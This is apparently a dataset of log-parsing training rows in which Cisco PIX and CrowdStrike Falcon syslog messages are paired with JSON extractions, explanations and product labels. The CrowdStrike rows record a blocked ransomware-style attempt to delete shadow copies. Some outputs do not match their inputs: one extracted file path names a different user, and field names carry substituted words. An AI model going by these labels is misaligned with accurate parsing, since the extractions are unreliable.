input_text stringlengths 52 64.8k | output_text stringlengths 23 66k | instruction stringclasses 3 values |
|---|---|---|
<172>Feb 06 2023 13:33:01 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:16.200.121.237 dst inside:212.95.58.70 (type 11, code 0) by access-group "outside"
| This is a syslog message from a product called PIX Firewall by Cisco. The following fields were extracted from the message:
priority: 172
senderhost: 10.52.255.1
severitylabel: warning
tags: ['cisco_pix_deny', 'deny', 'cisco_pix', 'firewall_action']
productids: [0]
severitycode: 4
sourceinfo: unknown
sensitivity: normal
facilitylabel: local5
messagetype: firewall_action
vendorcode: PIX-4-106023
action: block
protocol: 1
facilitycode: 21
streamName: cisco_pix
clientIP: 16.200.121.237
serverIP: 212.95.58.70 | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\janedoe\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=193.147.180.105 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\janedoe\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | {
"clienthostname": "SSTEWART-LT3.undefined",
"clientmac": "00155d4a00da",
"filehash": "3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249",
"filename": "setup.exe",
"filepath": "\\Device\\HarddiskVolume3\\Users\\StevenStewart\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"3810ea13b98a42adb0ff227fbaf6169f\",\"timestamp\":\"2023-06-12T13:04:28Z\",\"behavior_id\":\"458\",\"filename\":\"setup.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\janedoe\\\\AppData\\\\Local\\\\Temp\\\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\\\setup.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"C:\\\\Users\\\\STEVEN~1\\\\AppData\\\\Local\\\\Temp\\\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\\\setup.exe /clone_wait \\\"/W32:8923024:1024\\\"\",\"scenario\":\"ransomware\",\"objective\":\"Follow Through\",\"tactic\":\"Impact\",\"tactic_id\":\"TA0040\",\"technique\":\"Inhibit System Recovery\",\"technique_id\":\"T1490\",\"display_name\":\"VolumeShadowSnapshotDeleted\",\"description\":\"A process attempted to delete a Volume Shadow Snapshot.\",\"severity\":50,\"confidence\":60,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"janedoe\",\"user_id\":\"S-1-12-1-942142572-1204970278-157880471-3270697999\",\"control_graph_id\":\"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355\",\"triggering_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889\",\"sha256\":\"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249\",\"md5\":\"8ca190715cd1b0f67a9e14ecbc7bc27e\",\"parent_details\":{\"parent_sha256\":\"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee\",\"parent_md5\":\"ab7850166bd390bb01602ddc766cc662\",\"parent_cmdline\":\"\\\"C:\\\\Users\\\\janedoe\\\\Downloads\\\\TMVirtualPortDriver870a.exe\\\" \",\"parent_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_moscorpine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=193.147.180.105 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-06-12T13:04:28Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "193.147.180.105",
"userName": "janedoe"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\janedoe\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=193.147.180.105 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\janedoe\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\janedoe\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=193.147.180.105 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\janedoe\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: SSTEWART-LT3.undefined
clientmac: 00155d4a00da
filehash: 3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249
filename: setup.exe
filepath: \Device\HarddiskVolume3\Users\StevenStewart\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-06-12T13:04:28Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 193.147.180.105
userName: janedoe | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\janedoe\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=241.184.182.5 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\janedoe\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | {
"clienthostname": "SSTEWART-LT3.undefined",
"clientmac": "00155d4a00da",
"filehash": "3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249",
"filename": "setup.exe",
"filepath": "\\Device\\HarddiskVolume3\\Users\\StevenStewart\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"3810ea13b98a42adb0ff227fbaf6169f\",\"timestamp\":\"2023-06-12T13:04:28Z\",\"behavior_id\":\"458\",\"filename\":\"setup.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Users\\\\janedoe\\\\AppData\\\\Local\\\\Temp\\\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\\\setup.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"C:\\\\Users\\\\STEVEN~1\\\\AppData\\\\Local\\\\Temp\\\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\\\setup.exe /clone_wait \\\"/W32:8923024:1024\\\"\",\"scenario\":\"ransomware\",\"objective\":\"Follow Through\",\"tactic\":\"Impact\",\"tactic_id\":\"TA0040\",\"technique\":\"Inhibit System Recovery\",\"technique_id\":\"T1490\",\"display_name\":\"VolumeShadowSnapshotDeleted\",\"description\":\"A process attempted to delete a Volume Shadow Snapshot.\",\"severity\":50,\"confidence\":60,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"janedoe\",\"user_id\":\"S-1-12-1-942142572-1204970278-157880471-3270697999\",\"control_graph_id\":\"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355\",\"triggering_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889\",\"sha256\":\"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249\",\"md5\":\"8ca190715cd1b0f67a9e14ecbc7bc27e\",\"parent_details\":{\"parent_sha256\":\"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee\",\"parent_md5\":\"ab7850166bd390bb01602ddc766cc662\",\"parent_cmdline\":\"\\\"C:\\\\Users\\\\janedoe\\\\Downloads\\\\TMVirtualPortDriver870a.exe\\\" \",\"parent_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_mwayneine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=241.184.182.5 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-06-12T13:04:28Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "241.184.182.5",
"userName": "janedoe"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\janedoe\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=241.184.182.5 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\janedoe\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\janedoe\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"janedoe","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\janedoe\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=241.184.182.5 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\janedoe\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=janedoe ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-06-12T13:04:28Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: SSTEWART-LT3.undefined
clientmac: 00155d4a00da
filehash: 3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249
filename: setup.exe
filepath: \Device\HarddiskVolume3\Users\StevenStewart\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-06-12T13:04:28Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 241.184.182.5
userName: janedoe | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-06-12T13:04:28Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Users\\charlie\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe","alleged_filetype":"exe","cmdline":"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\{3D7277B3-B0BE-497C-A626-55F063254B5B}\\setup.exe /clone_wait \"/W32:8923024:1024\"","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"charlie","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:17183496355","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607035893889","sha256":"3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249","md5":"8ca190715cd1b0f67a9e14ecbc7bc27e","parent_details":{"parent_sha256":"4070ac7249ec3a90c1119236726050a34bb50110e1a7095f4855b1f7b9524eee","parent_md5":"ab7850166bd390bb01602ddc766cc662","parent_cmdline":"\"C:\\Users\\charlie\\Downloads\\TMVirtualPortDriver870a.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:1607032416516"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=33.80.171.219 ::: fileHash=3a8c7d9d5c4d92c41168bf073e9112799955fee0b66768aff89d9452cdfa8249 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Users\charlie\AppData\Local\Temp\{3D7277B3-B0BE-497C-A626-55F063254B5B}\setup.exe ::: userName=charlie ::: clientMAC=00155d4a00da ::: created_at=2023-06-12T13:04:28Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: 